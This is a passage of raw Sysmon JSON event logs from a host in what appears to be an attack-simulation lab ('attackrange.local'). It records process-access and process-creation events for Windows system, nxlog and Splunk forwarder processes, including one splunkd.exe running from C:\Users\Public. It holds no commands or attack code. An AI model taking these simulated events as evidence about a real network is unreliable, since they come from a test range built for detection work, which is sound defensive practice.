C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6220,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6221,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6222,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11FD-5F25-0000-0010451B0900}\r\nTargetProcessId: 4876\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11FD-5F25-0000-0010451B0900}","TargetProcessId":"4876","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6223,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.533\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.533","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6224,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.956\r\nProcessGuid: {E2A3D6B1-11FE-5F25-0000-0010281D0900}\r\nProcessId: 3840\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.956","ProcessGuid":"{E2A3D6B1-11FE-5F25-0000-0010281D0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6225,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-0010E7070800}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.955","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-0010E7070800}","TargetProcessId":"3840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6226,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-0010E7070800}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.955","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-0010E7070800}","TargetProcessId":"3840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6227,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 